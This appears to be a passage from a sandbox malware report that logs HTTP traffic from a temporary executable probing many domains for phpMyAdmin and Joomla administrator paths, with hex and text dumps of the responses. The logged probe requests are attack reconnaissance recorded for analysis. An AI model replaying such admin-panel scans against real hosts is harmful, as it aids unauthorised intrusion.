68	192.168.2.4	57460	68.183.34.12	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:38.832382917 CET	224	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: hul.co.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:39.008781910 CET	233	IN	HTTP/1.1 302 Found Date: Thu, 30 Nov 2023 10:22:38 GMT Server: Apache/2.4.57 (Ubuntu) Location: http://hul.co.uk/ Content-Length: 0 Content-Type: text/html; charset=UTF-8
Nov 30, 2023 11:22:39.053637028 CET	213	OUT	GET / HTTP/1.1 Host: hul.co.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:39.240259886 CET	1340	IN	HTTP/1.1 302 Found Date: Thu, 30 Nov 2023 10:22:39 GMT Server: Apache/2.4.57 (Ubuntu) Location: http://www.hul.co.uk Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Thu, 30 Nov 2023 10:22:39 +0000 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=7k8o6bqqudcjb50kn8otou86n3; path=/ Content-Length: 4111 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 0a 3c 21 2d 2d 20 79 73 6d 2f 20 2d 2d 3e 0a 3c 21 2d 2d 20 68 75 6c 2e 63 6f 2e 75 6b 20 2d 2d 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 57 65 6c 63 6f 6d 65 20 74 6f 20 48 55 4c 2e 63 6f 2e 75 6b 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 69 6d 61 67 65 74 6f 6f 6c 62 61 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 73 74 79 6c 65 73 2f 62 61 73 65 2e 63 73 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 68 75 6c 2e 63 6f 2e 75 6b 20 7c 20 53 65 61 72 63 68 20 66 6f 72 20 65 76 65 72 79 74 68 69 6e 67 20 68 75 6c 20 72 65 6c 61 74 65 64 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 2d 31 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 3c 21 2d 2d 0a 09 09 66 75 6e 63 74 69 6f 6e 20 61 64 64 5f 73 65 61 72 63 68 5f 74 72 65 6e 64 73 28 6b 65 79 77 6f 72 64 73 29 0a 09 09 7b 09 0a 09 09 09 76 61 72 20 77 69 64 74 68 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 6d 61 69 6e 5f 63 6f 6e 74 65 6e 74 27 29 2e 6f 66 66 73 65 74 57 69 64 74 68 3b 0a 09 09 09 76 61 72 20 74 72 65 6e 64 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 73 65 61 72 63 68 5f 74 72 65 6e 64 73 5f 66 72 61 6d 65 27 29 3b 0a 09 09 09 76 61 72 20 73 63 72 69 70 74 5f 73 72 63 20 3d 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 74 72 65 6e 64 73 2f 66 65 74 63 68 43 6f 6d 70 6f 6e 65 6e 74 3f 68 6c 5c 37 35 65 6e Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html>... ysm/ -->... hul.co.uk --><head><title>Welcome to HUL.co.uk</title><meta http-equiv="imagetoolbar" content="no" /><link rel="stylesheet" type="text/css" href="styles/base.css" /><meta name="description" lang="en" content="hul.co.uk \| Search for everything hul related" /><meta http-equiv="Pragma" content="no-cache" /><meta http-equiv="Expires" content="-1" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><script type="text/javascript">...function add_search_trends(keywords){var width = document.getElementById('main_content').offsetWidth;var trends = document.getElementById('search_trends_frame');var script_src = "http://www.google.com/trends/fetchComponent?hl\75en
Nov 30, 2023 11:22:39.240334034 CET	1340	IN	Data Raw: 2d 47 42 5c 34 36 71 5c 37 35 22 2b 6b 65 79 77 6f 72 64 73 2b 22 5c 34 36 67 65 6f 5c 37 35 47 42 5c 34 36 63 6d 70 74 5c 37 35 71 5c 34 36 63 6f 6e 74 65 6e 74 5c 30 37 35 31 5c 34 36 63 69 64 5c 37 35 54 49 4d 45 53 45 52 49 45 53 5f 47 52 41 Data Ascii: -GB\46q\75"+keywords+"\46geo\75GB\46cmpt\75q\46content\0751\46cid\75TIMESERIES_GRAPH_0\46export\0755\46w\075"+width+"\46h\075360";trends.setAttribute('src', script_src);trends.setAttribute('width',width);return false;}--></
Nov 30, 2023 11:22:39.240351915 CET	1340	IN	Data Raw: 65 20 66 6f 72 20 73 61 6c 65 20 6f 72 20 6c 65 61 73 65 3c 2f 61 3e 3c 2f 68 32 3e 0a 09 09 09 09 09 3c 70 3e 49 66 20 79 6f 75 20 61 72 65 20 69 6e 74 65 72 65 73 74 65 64 20 69 6e 20 48 55 4c 2e 63 6f 2e 75 6b 2c 20 70 6c 65 61 73 65 20 63 6c Data Ascii: e for sale or lease</a></h2><p>If you are interested in HUL.co.uk, please click <a href="/buy-this-domain.php">here</a> to find out more</p></div><div style="clear: both;"></div><div style="clear: both;"></div>
Nov 30, 2023 11:22:39.240369081 CET	735	IN	Data Raw: 3d 22 73 75 62 6d 69 74 22 20 76 61 6c 75 65 3d 22 53 75 62 6d 69 74 20 26 72 61 71 75 6f 3b 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 22 3e 3c 2f 64 69 76 3e 09 09 0a 09 3c 2f Data Ascii: ="submit" value="Submit »"></div></div><div class="clear"></div></fieldset></form></div><br/></div> ... notice-beige --></div> ... content --></div> ... bd --><div class="clear"></div><di

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.4	57486	3.64.163.50	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:38.866136074 CET	223	OUT	GET /phpmyadmin/ HTTP/1.1 Host: gbya.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:39.053615093 CET	341	IN	HTTP/1.1 410 Gone Server: openresty Date: Thu, 30 Nov 2023 10:22:38 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 34 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 30 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 67 62 79 61 2e 63 6f 6d 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 7<html>9 <head>44 <meta http-equiv='refresh' content='0; url=http://gbya.com/' />a </head>8</html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.4	57674	104.238.144.219	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:38.956981897 CET	224	OUT	GET /phpmyadmin/ HTTP/1.1 Host: nrnet.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:39.086956024 CET	542	IN	HTTP/1.1 301 Moved Permanently Date: Thu, 30 Nov 2023 10:22:39 GMT Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_wsgi/4.6.4 Python/3.6 Location: https://nrnet.com/phpmyadmin/ Content-Length: 237 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6e 72 6e 65 74 2e 63 6f 6d 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://nrnet.com/phpmyadmin/">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.4	57753	13.248.169.48	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:38.974865913 CET	219	OUT	GET /pma/ HTTP/1.1 Host: ct.ated.net Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:39.074649096 CET	1340	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 30 Nov 2023 10:22:39 GMT Content-Type: text/html Content-Length: 12477 Last-Modified: Mon, 13 Nov 2023 23:32:46 GMT Connection: keep-alive ETag: "6552b21e-30bd" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_F0BWPK753h3FClGPmJkuzP4V8EJa3+WTXE0lxxwsaxeE2/uZoBtG06zxDPBzkFqj//o+pXfBX0qO/GxkobcGYw Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=10.116.88.132;Path=/;Max-Age=86400; Set-Cookie: country=;Path=/;Max-Age=86400; Set-Cookie: city="";Path=/;Max-Age=86400; Set-Cookie: expiry_partner=;Path=/;Max-Age=86400; Accept-Ranges: bytes Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6e 6f 73 63 72 69 70 74 3e 3c 73 74 79 6c 65 3e 23 63 6f 6e 74 65 6e 74 2d 6d 61 69 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 20 20 20 20 7d 3c 2f 73 74 79 6c 65 3e 3c 64 69 76 3e 46 6f 72 20 66 75 6c 6c 20 66 75 6e 63 74 69 6f 6e 61 6c 69 74 79 20 6f 66 20 74 68 69 73 20 73 69 74 65 20 69 74 20 69 73 20 6e 65 63 65 73 73 61 72 79 20 74 6f 20 65 6e 61 62 6c 65 20 4a 61 76 61 53 63 72 69 70 74 2e 20 48 65 72 65 20 61 72 65 20 74 68 65 20 3c 61 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 65 6e 61 62 6c 65 2d 6a 61 76 61 73 63 72 69 70 74 2e 63 6f 6d 2f 22 3e 69 6e 73 74 72 75 63 74 69 6f 6e 73 20 68 6f 77 20 74 6f 20 65 6e 61 62 6c 65 20 4a 61 76 61 53 63 72 69 70 74 20 69 6e 20 79 6f 75 72 20 77 Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></title><noscript><style>#content-main { display: none; }</style><div>For full functionality of this site it is necessary to enable JavaScript. Here are the <a target="_blank" rel="noopener noreferrer" href="https://www.enable-javascript.com/">instructions how to enable JavaScript in your w
Nov 30, 2023 11:22:39.074676991 CET	1340	IN	Data Raw: 65 62 20 62 72 6f 77 73 65 72 3c 2f 61 3e 2e 3c 2f 64 69 76 3e 3c 2f 6e 6f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 76 61 72 20 61 62 70 20 3d 20 75 6e 64 65 66 69 6e 65 64 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 Data Ascii: eb browser</a>.</div></noscript><script>var abp = undefined;</script><script src="/px.js?ch=1&abp=1"></script><script src="/px.js?ch=2&abp=1"></script><script>!function(){"use strict";var e={49040:function(e,t,n){function r(e){return!0===e\|\|"t
Nov 30, 2023 11:22:39.074693918 CET	338	IN	Data Raw: 65 2e 6c 6f 67 4d 65 73 73 61 67 65 28 65 2e 4c 65 76 65 6c 2e 45 52 52 4f 52 2c 74 29 7d 7d 2c 7b 6b 65 79 3a 22 77 61 72 6e 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 65 2e 6c 6f 67 4d 65 73 73 61 67 65 28 Data Ascii: e.logMessage(e.Level.ERROR,t)}},{key:"warn",value:function(t){return e.logMessage(e.Level.WARN,t)}},{key:"info",value:function(t){return e.logMessage(e.Level.INFO,t)}},{key:"debug",value:function(t){return e.logMessage(e.Level.DEBUG,t)}},{key:
Nov 30, 2023 11:22:39.074712038 CET	1340	IN	Data Raw: 73 61 67 65 28 65 2e 4c 65 76 65 6c 2e 54 52 41 43 45 2c 74 29 7d 7d 5d 29 2c 65 7d 28 29 3b 66 75 6e 63 74 69 6f 6e 20 69 28 65 29 7b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 3d 74 79 70 65 6f 66 20 65 29 74 72 79 7b 72 65 74 75 72 6e 20 4a 53 4f Data Ascii: sage(e.Level.TRACE,t)}}]),e}();function i(e){if("object"===typeof e)try{return JSON.stringify(e)}catch(t){return a.error(t),e}return Array.isArray(e)?e.toString():e}a.Level={NONE:"NONE",ERROR:"ERROR",WARN:"WARN",INFO:"INFO",DEBUG:"DEBUG",TRACE
Nov 30, 2023 11:22:39.074733019 CET	1340	IN	Data Raw: 54 4e 45 52 5f 53 4e 3a 22 6e 61 6d 65 61 64 6d 69 6e 5f 70 61 72 6b 5f 64 6d 5f 32 39 30 33 5f 61 66 74 65 72 6e 69 63 22 2c 52 45 41 43 54 5f 41 50 50 5f 56 45 52 49 5a 4f 4e 5f 46 45 45 44 5f 50 41 52 54 4e 45 52 5f 43 50 3a 22 6e 61 6d 65 61 Data Ascii: TNER_SN:"nameadmin_park_dm_2903_afternic",REACT_APP_VERIZON_FEED_PARTNER_CP:"nameadmin_park_dm_2903_godaddy",REACT_APP_VERIZON_FEED_ENABLE:"true",REACT_APP_VERIZON_FEED_PROXY:"https://api.aws.parking.godaddy.com",REACT_APP_FORWARDER_LANDER_URL
Nov 30, 2023 11:22:39.074776888 CET	1340	IN	Data Raw: 74 6d 5f 6d 65 64 69 75 6d 3d 42 49 4e 4e 53 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 54 44 46 53 5f 42 49 4e 4e 53 26 74 72 61 66 66 69 63 5f 74 79 70 65 3d 54 44 46 53 5f 42 49 4e 4e 53 26 74 72 61 66 66 69 63 5f 69 64 3d 62 69 6e 6e 73 26 7b Data Ascii: tm_medium=BINNS&utm_campaign=TDFS_BINNS&traffic_type=TDFS_BINNS&traffic_id=binns&{QUERY}",TDFS_AFTERNIC:"https://www.afternic.com/forsale/{DOMAIN}?utm_source=TDFS_DASLNC&utm_medium=DASLNC&utm_campaign=TDFS_DASLNC&traffic_type=TDFS_DASLNC&traff
Nov 30, 2023 11:22:39.074796915 CET	1340	IN	Data Raw: 75 6e 63 74 69 6f 6e 20 72 28 65 29 7b 72 65 74 75 72 6e 20 72 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 22 73 79 6d 62 6f 6c 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 3f Data Ascii: unction r(e){return r="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},r(e)}n.d(t,{Z:funct
Nov 30, 2023 11:22:39.074820042 CET	1340	IN	Data Raw: 5f 3d 30 3b 5f 3c 64 2e 6c 65 6e 67 74 68 3b 5f 2b 2b 29 7b 76 61 72 20 66 3d 64 5b 5f 5d 3b 69 66 28 66 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 73 72 63 22 29 3d 3d 72 7c 7c 66 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 77 Data Ascii: _=0;_<d.length;_++){var f=d[_];if(f.getAttribute("src")==r\|\|f.getAttribute("data-webpack")==t+a){u=f;break}}u\|\|(c=!0,(u=document.createElement("script")).charset="utf-8",u.timeout=120,n.nc&&u.setAttribute("nonce",n.nc),u.setAttribute("data-web
Nov 30, 2023 11:22:39.074827909 CET	1340	IN	Data Raw: 65 7c 7c 6f 3d 3d 3d 74 29 72 65 74 75 72 6e 20 69 7d 7d 28 6f 2c 61 29 29 72 65 74 75 72 6e 20 74 28 29 3b 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 2c 6f 29 7b 76 61 72 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d Data Ascii: e\|\|o===t)return i}}(o,a))return t();!function(e,t,n,r,o){var a=document.createElement("link");a.rel="stylesheet",a.type="text/css",a.onerror=a.onload=function(n){if(a.onerror=a.onload=null,"load"===n.type)r();else{var i=n&&("load"===n.type?"mi
Nov 30, 2023 11:22:39.074879885 CET	1340	IN	Data Raw: 29 26 26 28 6e 2e 6d 5b 6f 5d 3d 75 5b 6f 5d 29 3b 69 66 28 63 29 63 28 6e 29 7d 66 6f 72 28 74 26 26 74 28 72 29 3b 64 3c 69 2e 6c 65 6e 67 74 68 3b 64 2b 2b 29 61 3d 69 5b 64 5d 2c 6e 2e 6f 28 65 2c 61 29 26 26 65 5b 61 5d 26 26 65 5b 61 5d 5b Data Ascii: )&&(n.m[o]=u[o]);if(c)c(n)}for(t&&t(r);d<i.length;d++)a=i[d],n.o(e,a)&&e[a]&&e[a][0](),e[a]=0},r=self.webpackChunkparking_lander=self.webpackChunkparking_lander\|\|[];r.forEach(t.bind(null,0)),r.push=t.bind(null,r.push.bind(r))}(),function(){var
Nov 30, 2023 11:22:39.074899912 CET	1340	IN	Data Raw: 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 5f 28 74 2e 54 44 46 53 5f 41 46 54 45 52 4e 49 43 2c 65 2e 64 6f 6d 61 69 6e 4e 61 6d 65 29 29 3b 73 28 65 2c 61 2e 45 52 52 4f 52 5f 49 4e 56 41 4c 49 44 5f 53 54 41 54 55 53 5f 43 4f 44 45 29 7d 65 6c Data Ascii: ation.replace(_(t.TDFS_AFTERNIC,e.domainName));s(e,a.ERROR_INVALID_STATUS_CODE)}else{var r=e.xhr.response.landingPage;if(r in c)u(e,r),window.location.replace(_(r,e.domainName));else{if(r!==t.PARKING)throw new Error("not expected lander:"+r);u

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.4	57671	194.63.248.47	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:39.020606995 CET	222	OUT	GET /phpmyadmin/ HTTP/1.1 Host: z-a.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:39.222383022 CET	534	IN	HTTP/1.1 302 Found Date: Thu, 30 Nov 2023 10:22:39 GMT Server: Apache/2.4.25 (Debian) Location: https://z-a.com/phpmyadmin/ Content-Length: 284 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 7a 2d 61 2e 63 6f 6d 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 35 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 7a 2d 61 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://z-a.com/phpmyadmin/">here</a>.</p><hr><address>Apache/2.4.25 (Debian) Server at z-a.com Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.4	56445	213.171.212.244	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:39.117340088 CET	233	OUT	GET /administrator/index.php HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:39.298736095 CET	454	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Thu, 30 Nov 2023 10:22:39 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: https://gco.uk/administrator/index.php Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.4	56414	213.171.212.244	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:39.118205070 CET	233	OUT	GET /administrator/index.php HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:39.298728943 CET	454	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Thu, 30 Nov 2023 10:22:39 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: https://gco.uk/administrator/index.php Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.4	58254	15.197.172.60	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

